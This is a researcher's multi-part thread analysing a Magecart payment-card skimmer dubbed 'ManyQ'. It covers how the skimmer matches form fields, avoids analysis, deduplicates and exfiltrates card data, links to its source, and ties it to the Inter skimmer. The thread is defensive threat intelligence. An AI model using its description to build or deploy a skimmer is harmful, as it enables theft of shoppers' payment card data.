Been looking at a digital skimmer/#magecart script I call "ManyQ" and figured I'd share what I've found.

Highlights: 200+ victims, in use since at least Feb 2020, and, most interesting, might be by Sochi, the creator of Inter.

1/30
Going to cover a fair amount of ground here:

- How it works
- Share some various copies of it
- Infrastructure it's been deployed on and related infrastructure
- Connections to Inter

And, yeah, "ManyQ" isn't the greatest name, but naming things is hard.

2/30
Ok, first, here's some source code:

ManyQ Obfuscated: gist.github.com/krautface/ea24…

ManyQ Fully Deobfuscated: gist.github.com/krautface/5c13…

This skimmer was the one exfiltrating via Google Apps Script, but that's not directly a function of the skimmer itself:


3/30
I'm going to highlight parts of the skimmer, partially out of order. Also, most of these screenshots are from my deob version.

First, it allows the attacker to easily customize it to attack various stores.

4/30 [screenshot]
These settings are used to tell the skimmer what fields to look for. It also allows an attacker to target form fields by either name or id. The addressFields also tell the skimmer whether it should look for a select field (dropdown) with the last variable.

5/30
Those settings are used by the processFields function. This function loops through all the form fields passed into it and checks to see if any of them matches one of the 8 paymentFields, or one of the 7 addressFields.

6/30 [screenshot]
It does this using 8 nearly identical IF statements for the payment info, and a FOR loop for the address fields, along with more IF statements. Each IF statement attempts to match the details of the field it's examining with the custom settings of the skimmer.

7/30
processFields is called multiple times by the "gatherFields" function. It, surprisingly enough, gathers all the fields up to be examined. It will then call "savePayload" to store the payload as a cookie (if a variable is set).

8/30 [screenshot]
A lot of skimmers have anti-RE techniques in them, and ManyQ has some as well, albeit approaching things in a different way. Instead of trying to detect Chrome Devtools, it's trying to detect if it's being executed outside of a browser.

9/30 [screenshot]
The "start" function is the first thing called. It runs the anti-reverse engineering check and then starts a loop that checks the payment form every 500ms by calling the "gatherAndExfil" function.

10/30 [screenshot]
"gatherAndExfil" does two things: calls "gatherFields" (described above) and calls "prepareAndExfil". The latter is always watching the page to see if four values have been filled: CC #, CVV, Card Holder, Expiration Date.

11/30 [screenshot]
If those four values are present, it exfils the data. To prevent itself from exfiltrating the same data multiple times, it creates a simple hash of the value it exfilled and saves that to an array.

12/30 [screenshot]
Now, amusingly, this can result in a bunch of exfil attempts if you first fill in your payment info, and then fill out the rest of your billing information. It also stores some of this information as a cookie.

13/30 [screenshot]
And those are the major parts of the code. There were some things that were basically no-ops, and other parts that weren't used. This skimmer also supports payment overlays, which this version utilized:

14/30

I've identified 23 domains so far that either have loaded this code onto a victim website, or been used to exfiltrate the data from a victim's website:

gist.github.com/krautface/b97d…

15/30

And, just for fun, here are 23 related skimming domains:

gist.github.com/krautface/7674…

16/30
Ok, now connections to Inter. To start, here's a more recent copy of Inter:

gist.github.com/krautface/af05…

17/30
Inter does a lot of the same things that ManyQ does. In fact, it does all the things that ManyQ does. It watches the page and once the payment information is collected, it exfils immediately. It used to use an MD5 hash to prevent dupes.

18/30
But that changed recently. Previously it had a function called "calcMD5"; in the copy of Inter linked above that function is missing, and at the top there is a new "hashCode" function instead.

19/30 [screenshot]
That hashCode function was added to Inter after it appeared in ManyQ. Here is the ManyQ version. It looks a little different, but it computes the same values.
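One way to confirm the "looks different but computes the same values" claim above is differential testing of the two deobfuscated functions. The block below is an added example, not code from the thread or from either skimmer; it assumes (an assumption, since the screenshots are not reproduced here) that both functions are the common JavaScript port of Java's String.hashCode, written two different ways, and it adds a decoy variant that drops the 32-bit wrap to show why the test corpus must include inputs long enough to overflow.

```javascript
// Added example (not from the thread or either skimmer). ASSUMPTION: both skimmers'
// "hashCode" is the usual JS port of Java's String.hashCode: h = 31*h + charCode,
// kept as a signed 32-bit integer. The two variants below are two common spellings.

// Variant written with a shift: (h << 5) - h equals 31 * h; |= 0 wraps to int32.
function hashShift(str) {
  let h = 0;
  for (let i = 0; i < str.length; i++) {
    h = ((h << 5) - h) + str.charCodeAt(i);
    h |= 0;
  }
  return h;
}

// Variant written with Math.imul: 32-bit multiply, then | 0 after the add.
function hashImul(str) {
  let h = 0;
  for (let i = 0; i < str.length; i++) {
    h = (Math.imul(31, h) + str.charCodeAt(i)) | 0;
  }
  return h;
}

// Decoy that forgets the int32 truncation: agrees on short inputs, diverges as
// soon as 31*h leaves the 32-bit range. Short test strings would not catch this.
function hashNoWrap(str) {
  let h = 0;
  for (let i = 0; i < str.length; i++) h = 31 * h + str.charCodeAt(i);
  return h;
}

// Constructed corpus: empty string, short strings that never overflow, a
// card-number-shaped digit string (constructed, not a real card), non-ASCII
// input, and a long string so that the multiply wraps many times.
const CORPUS = ['', 'hello', 'hello world', '0000111122223333', 'Jörg Müller', 'a'.repeat(64)];

// Return the first corpus input on which fnA and fnB disagree, or null if they
// agree on every input. null over a corpus that exercises the wrap is the
// evidence an analyst wants before calling two obfuscated functions equivalent.
function firstDivergence(fnA, fnB, inputs = CORPUS) {
  for (const s of inputs) {
    if (fnA(s) !== fnB(s)) return s;
  }
  return null;
}
```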

20/30 [screenshot]
Next, let's compare the ManyQ "gatherFields" function to the Inter "SaveAllFields" function. Slight difference in that "gatherFields" passes the arrays it captures, whereas SaveAllFields loops through them, but very close.

21/30 [two screenshots]
ManyQ's "processFields" is an improved version of Inter's "SaveParam". The main difference being that the settings for ManyQ are held outside the function and it can handle arrays of fields.

22/30 [two screenshots]
Before exfil, both skimmers check for four values, in this order and with these names: Number, Holder, Date, CVV:

23/30 [two screenshots]
And, while there's more, one last example: If you look at "processFields" in ManyQ and "GetCCInfo" in Inter, you'll see that the 8 IF statements in both gather the same 8 bits of data in almost exactly the same way.

24/30
So I'd say that leaves three options: 1. ManyQ is a new product of Sochi's, and possibly a new skimming kit. 2. ManyQ is actually just a new version of Inter. 3. Someone ripped off Sochi's code.

25/30
Option 3 is probably the least likely, in my opinion, simply because there have been attackers who have moved from Inter to ManyQ, and reputationally that would be... awkward.

26/30
Example:

jquerylib[.]at in March: Inter urlscan.io/result/389da71…

jquerylib[.]at now: ManyQ urlscan.io/result/86527b8…

27/30
So, that's a lot of tweets. There's more to this skimmer for sure, and if anyone else has already named this thing, please let me know. I'd rather adopt an existing name. "ManyQ" just meant I had "Many Questions" about it.

28/30
Also, just figured I'd point out that the variable names in the deobfuscated version of ManyQ are my creation. If you want a pretty clean version of ManyQ that doesn't have any of my names, this is a pretty good one:

gist.github.com/krautface/04a7…

29/30
Oh, and if I got anything wrong, please point it out.

30/30
